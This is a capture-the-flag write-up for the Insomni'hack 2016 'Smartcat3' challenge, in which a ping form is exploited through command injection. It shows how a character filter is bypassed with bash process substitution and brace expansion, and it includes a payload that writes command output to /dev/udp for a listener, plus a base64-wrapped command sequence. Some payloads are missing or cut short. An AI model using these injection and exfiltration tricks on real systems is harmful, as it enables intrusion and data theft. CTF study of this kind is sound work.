Tags: writeup 


#Insomni'hack CTF 2016 : Smartcat3


This challenge was a little bit tricky but fun.
It is based on a website with a form to get the status (Up/Down) of an IP. The source code was avalaible [you can find it here](http://pastebin.com/haAqxW9w)

So, the tricky part was to bypass the `sanity_check` function which parse our input and return TRUE if any of this char is found : ```"$&\;`|*"``` and the result must be send on the port 53 because of the firewall : `# The firewall only allows the strict minimum required for this chall, aka # OUTPUT on udp/53 and icmp. INPUT is port 80 only."`

After some research, it was possible to execute arbitrary command with the following payload : `<(ls>/dev/udp/` and get the following result in the nc listenner : `ping.cgi`

It was nice, but we needed an other trick because space char is not in `string.ascii_letters, string.digits, string.punctuation` so the sanity_check function return TRUE if we use space.
After some research, we found to following trick :
In bash, if you use `{}` you can get a string with space like this :
`echo {"Hello","World"}`

>Hello World

So, it was possible the search some flag file in the filesystem like this :

And find it on the top root directory :

But a last part was asked :
`Almost there... just trying to make sure you can execute arbitrary commands....
Write 'Give me a...' on my stdin, wait 2 seconds, and then write '... flag!.
Do not include the quotes. Each part is a different line."`

The easy solution is the following :

echo -ne '(echo "Give me a..."; sleep 2; echo "... flag!") | /read_flag flag' | base64

Then :

And get the flag !
Enjoy, thank to [Xer](https://twitter.com/XeR_0x2A) for his help :)

Original writeup (https://github.com/hexpresso/WU-2016/tree/master/insomnihack-ctf-2016/misc/Smartcat3).